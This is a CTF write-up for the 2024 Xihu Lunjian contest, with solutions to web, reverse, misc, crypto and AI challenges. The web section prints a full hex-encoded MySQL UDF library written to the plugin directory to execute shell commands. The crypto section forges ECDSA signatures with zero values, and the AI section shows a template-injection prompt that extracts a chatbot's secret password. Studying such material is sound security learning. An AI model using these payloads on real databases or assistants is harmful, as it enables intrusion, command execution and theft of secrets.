第七届西湖论剑·中国杭州网络安全技能大赛

date
Jan 31, 2024
slug
xhlj-2024
status
Published
tags
CTF
WriteUP
summary
type
Post

Web

only_sql

连接,Fakemysql读取文件。
notion image
notion image
连接密码
// $db_host = '127.0.0.1';

// $db_username = 'root';

// $db_password = '1q2w3e4r5t!@#';

// $db_name = 'mysql';

**show global variables like 'secure%';**

secure_file_priv=''

show variables like '%basedir%';
mysql插件目录
show variables like '%plugin%'; /usr/lib/mysql/p1ugin/
udf提权
SELECT
SELECT 0x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000 INTO DUMPFILE '/usr/lib/mysql/p1ugin/udf.so';create function sys_eval returns string soname 'udf.so';


select sys_eval('ls');easy_rawraw
 

Reverse

MZ

很简单的思路。。。
单向链表
struct __declspec(align(4)) Node
{
  char Value;
  Node *Next;
};
然后就是根据 value 去走 path
两个约束条件,外加一个sha1 check
跑起来在初始化Node函数之后打个断点,写个 idapython dfs 一下就行了
 
import ida_bytes
import hashlib

def depth_first_search(current_depth, current_path):
    global is_flag_found
    if current_depth == 49:
        flag_bytes = bytearray([(~(element[0] + element[2])) & 0xff for element in flag_sequence[:-1]])
        flag_string = ''.join([chr(element[0]) for element in flag_sequence[:-1]])
        print(flag_string)
        sha1_digest = hashlib.sha1()
        sha1_digest.update(flag_bytes)
        calculated_hash = sha1_digest.hexdigest()
        if calculated_hash == 'dc0562f86bec0a38508e704aa9faa347101e1fdb':
            is_flag_found = True
            print(calculated_hash)
            print(flag_sequence)
        return
    if not is_flag_found and len(current_path) > 0:
        for next_node in current_path:
            flag_sequence.append(next_node)
            next_path = find_next_nodes(next_node[1])
            depth_first_search(current_depth + 1, next_path)
            flag_sequence.pop()

def find_next_nodes(current_base):
    next_nodes = []
    for i in range(0x20, 0x7f):
        v5 = ida_bytes.get_dword(current_base + i * 8)
        if v5 == i - 5:
            next_base = ida_bytes.get_dword(current_base + i * 8 + 4)
            next_nodes.append((i, next_base, 1))
        elif v5 == i + 5:
            next_base = ida_bytes.get_dword(current_base + i * 8 + 4)
            next_nodes.append((i, next_base, -1))
    return next_nodes

is_flag_found = False
flag_sequence = []
initial_base = 0x999078
initial_path = find_next_nodes(initial_base)
depth_first_search(0, initial_path)
print(flag_sequence)
print("end")

Misc

2024签到题

签到一下就行。
notion image

数据安全-easy_tables

按照文件所给的逐步排除数据库语句有问题的编号,直接写个脚本就行。
给的文件第一行和尾部的空行要去掉。
import re
from datetime import datetime
flag = []
def is_time_in_ranges(time_str, ranges):
    # 解析时间字符串
    target_time = datetime.strptime(time_str, '%H:%M:%S')

    # 遍历每个时间范围并检查时间是否在范围内
    for range_str in ranges:
        start_time, end_time = map(lambda x: datetime.strptime(x, '%H:%M:%S'), range_str.split('~'))
        if start_time <= target_time <= end_time:
            return True

    return False
def extract_sql_operation(sql_statement):
    # 使用正则表达式匹配 SQL 语句的操作类型
    pattern = re.compile(r'\b(insert|delete|update|select)\b', re.IGNORECASE)
    match = pattern.search(sql_statement)

    if match:
        # 返回匹配到的操作类型
        return match.group(1).upper()  # 将操作类型转为大写形式

    return None
def extract_table_name(sql_statement):
    # 使用正则表达式匹配 SQL 语句中的表名
    pattern = re.compile(r'\bFROM\b\s+([^\s;]+)|\bJOIN\b\s+([^\s;]+)|\bUPDATE\b\s+([^\s;]+)|\bINTO\b\s+([^\s;]+)|\bMERGE\b\s+([^\s;]+)|\bTABLE\b\s+([^\s;]+)', re.IGNORECASE)
    match = pattern.search(sql_statement)

    if match:
        # 返回匹配到的第一个组的值
        return next(group for group in match.groups() if group is not None)

    return None
#用户列表提取
userr = open('users.csv', encoding='utf-8')
content = userr.read()
users = list()
user = {}
rows = content.split('\n')
for row in rows:
    lists = row.split(',')
    users.append(row.split(','))
    user[lists[1]]=int(lists[0])
actionlog = open('actionlog.csv',encoding='utf-8')
line = actionlog.read()
loglines = line.split('\n')
#表格提取
tabless = open('tables.csv', encoding='utf-8')
content = tabless.read()
tables = list()
table = {}
rows = content.split('\n')
for row in rows:
    lists = row.split(',')
    tables.append(row.split(','))
    table[lists[1]]=int(lists[0])
#组别提取
permissionss = open('permissions.csv',encoding='utf-8')
linet =permissionss.read()
lines = linet.split('\n')
permissions=[]
# 使用正则表达式匹配每个段落
# pattern = re.compile(r'(\d+),(\w+),"([^"]+)","([^"]+)"')
for line in lines:
    pattern = re.compile(r'(\w+),(\w+),(".*?"|[^,]+),(".*?"|[^,]+)')
    matches = pattern.match(line)

    if matches:
        # 提取匹配的组
        group1 = matches.group(1)
        group2 = matches.group(2)

        # 判断是否有双引号,有的话将其内容转换为列表,没有则为单个元素
        operations_str = matches.group(3)
        operations_list = operations_str.strip('\"').split(',') if '\"' in operations_str else [operations_str]

        numbers_str = matches.group(4)
        numbers_list = numbers_str.strip('\"').split(',') if '\"' in numbers_str else [numbers_str]

        # 将结果组装成嵌套列表
        permissions.append([group1, group2, operations_list, numbers_list])
#日志提取
actionlog = open('actionlog.csv',encoding='utf-8')
line = actionlog.read()
loglines = line.split('\n')
# 使用逗号分隔提取前三个值

for logline in loglines:
    values = logline.split(',', 3)
    if values[1] in user.keys():
        tuser = users[user[values[1]]-1]
        tpermissions = permissions[int(tuser[3])-1]
        sqlhead  = tpermissions[2]
        tablepass = tpermissions[3]

        tablename = extract_table_name(values[3])
        ttable = tables[table[tablename]-1]
        if str(table[tablename]) in tablepass:
            sqlh = extract_sql_operation(values[3]).lower()
            if sqlh in sqlhead:
                time_ranges = [item.replace('"', '') for item in ttable[2:]]
                datetime_object = datetime.strptime(values[2], '%Y/%m/%d %H:%M:%S')
                # 提取时间部分
                time_only = datetime_object.time()
                if is_time_in_ranges(str(time_only),time_ranges):
                    pass
                else:
                    son = tuser[0] + '_' + tpermissions[0] + '_' + str(table[tablename]) + '_' + values[0]
                    flag.append(son)

            else:
                son = tuser[0] + '_' + tpermissions[0] + '_' + str(table[tablename]) + '_' + values[0]
                flag.append(son)
        else:
            son = tuser[0]+'_'+tpermissions[0]+'_'+str(table[tablename])+'_'+values[0]
            flag.append(son)
        ttable = tables[table[tablename]-1]
    else:
        son = '0_0_0_'+values[0]
        flag.append(son)
def custom_sort(item):
    parts = item.split('_')
    return tuple(map(int, parts))

sorted_list = sorted(flag, key=custom_sort)

print(sorted_list)
for i in sorted_list:
    print(i,end='')
    print(',',end='')

easy_rawraw

搜密码后发现内存里有两个密码和pass.txt 爆破8位数字pass.txt 然后去密钥文件挂载
notion image
 

Crypto

Or1cle

nc 后 get_flag 操作,随便输入不满64位的数字后报错,泄露出源码如下
def verify(self,z, signature):
	r, s = int(signature[:64], 16),int(signature[64:], 16)
  z=int(hashlib.sha256(z).hexdigest(),16)
	s_inv = pow(s, secp256k1.q - 2, secp256k1.q)
	u1 =(z* s_inv)% secp256k1.q
	u2 =(r*s_inv)% secp256k1.q
	point = u1* secp256k1.G + u2 * self.P
	return point.x==r
判断出是secp256k1的椭圆曲线 ECDSA签名认证,泄露出的一部分应该是签名的认证函数,其求逆元的方式s_inv = pow(s, secp256k1.q - 2,ecp256k1.q) 存在隐患,可以想办法伪造签名使得s,r为0,然后s_inv = 0,最后返回true。
构造64 位 以上的0,就可以使得r和s都为0,然后就得到flag了。

AI

AI-回声海螺

海螺输入我要{{password}}
保险柜输入一下就有了
notion image

数据安全

Cyan-1

做完题目拿到flag
notion image
 

© Z00M Team 2022 - 2024